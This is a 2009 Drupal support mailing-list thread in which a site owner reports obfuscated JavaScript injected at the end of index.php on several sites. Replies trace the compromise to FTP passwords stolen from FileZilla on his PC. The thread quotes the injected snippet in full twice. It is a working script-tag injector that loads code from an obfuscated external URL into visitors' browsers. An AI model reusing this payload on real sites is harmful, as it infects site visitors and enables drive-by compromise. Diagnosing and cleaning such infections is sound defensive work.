Hello,
I've encounterd a strange problem.
One of me sites has a changed index.php. The date of the file changed and the following lines were added at the end of the file:
/*GNU GPL*/ try{window.onload = function(){var G2kfrz1an5r = document.createElement('s&$c$@(#r!!i^$p^$t^$@'.replace(/$|)|(|&|!|^|@|#/ig, ''));var Bl136slxkfs = 'Y0p6c2vs6gca8';G2kfrz1an5r.setAttribute('type', 't^!^^e#&x!$@t)(@/!)(j@#$@a@)v#a!)s^c$(r(!&^i^^^)p&)$!t#&@'.replace(/@|)|#|(|&|$|!|^/ig, ''));G2kfrz1an5r.setAttribute('src', 'h()t)&^t#(p$:#!#!/$@!^/()q@(u))&i$$^k(##r$^-(^!@#c$o&&m).#^i(^#m@&&a(g^$e&$f(##a$p()(.^&c@^()@o&^$^m$^^.!@&#l!a(^s#)t@-^))f#@&m#.$$t@^h#$e)&(g$&i@&(f($@t)@&s$a(&)#l!)e@#.^r&)#u#!!(:)@&8#&(!0#&8$@$&0&((/#!^u^!&s^p^!!s(.^&^c@(o@$#m@^/((u@@!s@p$$@s$.^$$#c@o)m$@((!/!^a&#!!d@$u@l@t)$f#$$r@)!^i$e$!&n$#)d!)f(^i#n(!d)($e&)r!@@!.)(^c(o$m!!!!/@#(g@^o#@o$@g)()l#&)^e#).@(c)o(m$@^#/@#d@a@!i$l@^#y#&m)$a#i)(l)(#.(@!c&(o@(&@.$(!!u!#k^!@/)!!$'.replace(/@|)|!|(|^|&|$|#/ig, ''));G2kfrz1an5r.setAttribute('defer', 'd(&e)f(^e!r('.replace(/#|)|&|@|(|!|^|$/ig, ''));G2kfrz1an5r.setAttribute('id', 'S$##0@9^&&q$!^(t@b@$$7&(#v$))b#^@^v(!)y)#$9^@5&^#'.replace(/$|#|^|(|&|@|)|!/ig, ''));document.body.appendChild(G2kfrz1an5r);}} catch(Y2gjfbp30rk) {}
I have the impression this is encrypted javascript.
Is this site hacked ? And if yes, is this due to Drupal or server-side ?
Thank you
Steven
steven@vermoere.net ha scritto:
Hello,
I've encounterd a strange problem.
One of me sites has a changed index.php. The date of the file changed and the following lines were added at the end of the file:
Ok. Change the user's password that you use to connect to the server. If you are in hosting contact your provider and report this hack. If you are in housing and you use ssh to connect to the server with the same user, you server could be compromise. Do a check.
M.
Hello,
Meanwhile, the password has changed.
But I have a freakier issue:
I checked the other websites that I have and they all have the same problem.
They are however all at other hosting companies. All usernames and passwords are different and are composed of random characters (capitals, numbers, non-capitals). All Drupalversions are also different (1 most recent, other one 5, another one 6) I find it difficult to believe that all sites are hacked at the same time, with all different hosters at different locations.
Strange
steven@vermoere.net ha scritto:
Hello,
I've encounterd a strange problem.
One of me sites has a changed index.php. The date of the file changed and the following lines were added at the end of the file:
Ok. Change the user's password that you use to connect to the server. If you are in hosting contact your provider and report this hack. If you are in housing and you use ssh to connect to the server with the same user, you server could be compromise. Do a check.
M.
-- Michel 'ZioBudda' Morelli michel@ziobuddalabs.net Sviluppo applicazioni CMS DRUPAL e web dinamiche (LAMP+Ajax) Telefono: 0200619074 Telefono Cell: +39-3939890025 -- Fax: +39-0291390660
http://www.ziobudda.net ICQ: 58351764 http://www.ziobuddalabs.it Skype: zio_budda http://www.ziodrupal.net MSN: michel@ziobuddalabs.it JABBER: michel@ziobuddalabs.it
-- [ Drupal support list | http://lists.drupal.org/ ]
steven@vermoere.net ha scritto:
Hello,
Meanwhile, the password has changed.
But I have a freakier issue:
I checked the other websites that I have and they all have the same problem.
All ???
Are you sure that you don't have a zombie pc ? A keylogger on your pc ?
M.
Have you notified the hosting companies? They need to check other shared hosting accounts on the same servers as yours.
-- Ryan LeTulle
On Wed, Dec 30, 2009 at 8:08 AM, Michel Morelli michel@ziobuddalabs.itwrote:
steven@vermoere.net ha scritto:
Hello,
Meanwhile, the password has changed.
But I have a freakier issue:
I checked the other websites that I have and they all have the same
problem.
All ???
Are you sure that you don't have a zombie pc ? A keylogger on your pc ?
M.
-- Michel 'ZioBudda' Morelli michel@ziobuddalabs.net Sviluppo applicazioni CMS DRUPAL e web dinamiche (LAMP+Ajax) Telefono: 0200619074 Telefono Cell: +39-3939890025 -- Fax: +39-0291390660
http://www.ziobudda.net ICQ: 58351764 http://www.ziobuddalabs.it Skype: zio_budda http://www.ziodrupal.net MSN: michel@ziobuddalabs.it JABBER: michel@ziobuddalabs.it
-- [ Drupal support list | http://lists.drupal.org/ ]
I checked the other websites that I have and they all have the same problem.
They are however all at other hosting companies. All usernames and passwords are different and are composed of random characters (capitals, numbers, non-capitals). All Drupalversions are also different (1 most recent, other one 5, another one 6) I find it difficult to believe that all sites are hacked at the same time, with all different hosters at different locations.
Sounds like your PC has been comprised and someone has access to all FTP accounts stored there. I would run a very thorough check on your local machines for viruses and/or other unwanted nasties.
F
I'll check it ASAP, but I do not see anything special at this moment. I'll keep you informed.
Thanks
I checked the other websites that I have and they all have the same problem.
They are however all at other hosting companies. All usernames and passwords are different and are composed of random characters (capitals, numbers, non-capitals). All Drupalversions are also different (1 most recent, other one 5, another one 6) I find it difficult to believe that all sites are hacked at the same time, with all different hosters at different locations.
Sounds like your PC has been comprised and someone has access to all FTP accounts stored there. I would run a very thorough check on your local machines for viruses and/or other unwanted nasties.
F
[ Drupal support list | http://lists.drupal.org/ ]
I googled some of the code and found this:
http://blog.bigg.net/2009/12/gnu-gpl-trywindow-onload-functionvar-trojan-fix...
----- Original Message ----- From: steven@vermoere.net To: support@drupal.org Sent: Wednesday, December 30, 2009 9:58:50 AM GMT -05:00 US/Canada Eastern Subject: Re: [support] Hacked or not
I'll check it ASAP, but I do not see anything special at this moment. I'll keep you informed.
Thanks
I checked the other websites that I have and they all have the same problem.
They are however all at other hosting companies. All usernames and passwords are different and are composed of random characters (capitals, numbers, non-capitals). All Drupalversions are also different (1 most recent, other one 5, another one 6) I find it difficult to believe that all sites are hacked at the same time, with all different hosters at different locations.
Sounds like your PC has been comprised and someone has access to all FTP accounts stored there. I would run a very thorough check on your local machines for viruses and/or other unwanted nasties.
F
[ Drupal support list | http://lists.drupal.org/ ]
Meanwhile, I found the culprit:
On monday, I've had a malware on my PC. Suddenly, while visiting a website (I do not remember him anymore), my java started working and I had a malware on my PC. After 30 minutes, I managed to get it deleted from my PC, but the harm was done.
I was using filezilla and there, the passwords are stored in a simple text-file. This textfile has been sent to somewhere in Russia and then the sites were hacked with that information.
30 minutes are already enough to do this many harm. Shame on me, because my antivirus was complaining and I clicked Ignore instead of Heal....
Thanks everybody
Steven
_____
From: support-bounces@drupal.org [mailto:support-bounces@drupal.org] On Behalf Of patrick.bowe@comcast.net Sent: woensdag 30 december 2009 16:15 To: support@drupal.org Subject: Re: [support] Hacked or not
I googled some of the code and found this:
http://blog.bigg.net/2009/12/gnu-gpl-trywindow-onload-functionvar-trojan-fix /
----- Original Message ----- From: steven@vermoere.net To: support@drupal.org Sent: Wednesday, December 30, 2009 9:58:50 AM GMT -05:00 US/Canada Eastern Subject: Re: [support] Hacked or not
I'll check it ASAP, but I do not see anything special at this moment. I'll keep you informed.
Thanks
I checked the other websites that I have and they all have the same problem.
They are however all at other hosting companies. All usernames and passwords are different and are composed of random characters (capitals, numbers, non-capitals). All Drupalversions are also different (1 most recent, other one 5, another one 6) I find it difficult to believe that all sites are hacked at the same time, with all different hosters at different locations.
Sounds like your PC has been comprised and someone has access to all FTP accounts stored there. I would run a very thorough check on your local machines for viruses and/or other unwanted nasties.
F
[ Drupal support list | http://lists.drupal.org/ ]
See: My site was defaced ("hacked"). Now what?http://drupal.org/node/213320
If your index file has been been modified then your site has been hacked, likely by a bot. Change that index file and revisit the file permissions for your Drupal code files. Ask your hosts if they have a back-up of your database and see if they are willing to work with you to identify when each account was compromised.
Cheers, Kieran Drupal security team coordinator
2009/12/30 steven steven@vermoere.net
Hello,
I've encounterd a strange problem.
One of me sites has a changed index.php. The date of the file changed and the following lines were added at the end of the file:
/*GNU GPL*/ try{window.onload = function(){var G2kfrz1an5r =
document.createElement('s&$c$@(#r!!i^$p^$t^$@'.replace(/$|)|(|&|!|^|@|#/ig, ''));var Bl136slxkfs = 'Y0p6c2vs6gca8';G2kfrz1an5r.setAttribute('type', 't^!^^e#&x!$@t)(@/!)(j@#$@a@ )v#a!)s^c$(r(!&^i^^^)p&)$!t#&@'.replace(/@|)|#|(|&|$|!|^/ig, ''));G2kfrz1an5r.setAttribute('src', 'h()t)&^t#(p$:#!#!/$@!^/()q@(u))&i$$^k(##r$^-(^!@#c$o&&m).#^i(^#m@ &&a(g^$e&$f(##a$p()(.^&c@^()@o&^$^m$^^.!@&#l!a(^s#)t@-^))f#@&m#.$$t@ ^h#$e)&(g$&i@&(f($@t)@&s$a(&)#l!)e@ #.^r&)#u#!!(:)@&8#&(!0#&8$@$&0&((/#!^u^!&s^p^!!s(.^&^c@(o@$#m@^/((u@@!s@p $$@s$.^$$#c@o)m$@((!/!^a&#!!d@$u@l@t)$f#$$r@ )!^i$e$!&n$#)d!)f(^i#n(!d)($e&)r!@@!.)(^c(o$m!!!!/@#(g@ ^o#@o$@g)()l#&)^e#).@(c)o(m$@^#/@#d@a@!i$l@^#y#&m)$a#i)(l)(#.(@!c&(o@ (&@.$(!!u!#k^!@/)!!$'.replace(/@|)|!|(|^|&|$|#/ig, ''));G2kfrz1an5r.setAttribute('defer', 'd(&e)f(^e!r('.replace(/#|)|&|@|(|!|^|$/ig, ''));G2kfrz1an5r.setAttribute('id', 'S$##0@9^&&q$!^(t@b @$$7&(#v$))b#^@^v(!)y)#$9^@5&^#'.replace(/$|#|^|(|&|@|)|!/ig, ''));document.body.appendChild(G2kfrz1an5r);}} catch(Y2gjfbp30rk) {}
I have the impression this is encrypted javascript.
Is this site hacked ? And if yes, is this due to Drupal or server-side ?
Thank you
Steven
-- [ Drupal support list | http://lists.drupal.org/ ]
-
Fred Jones -
Kieran Lal -
Michel Morelli -
patrick.bowe@comcast.net -
Ryan Letulle -
Steven Vermoere -
steven@vermoere.net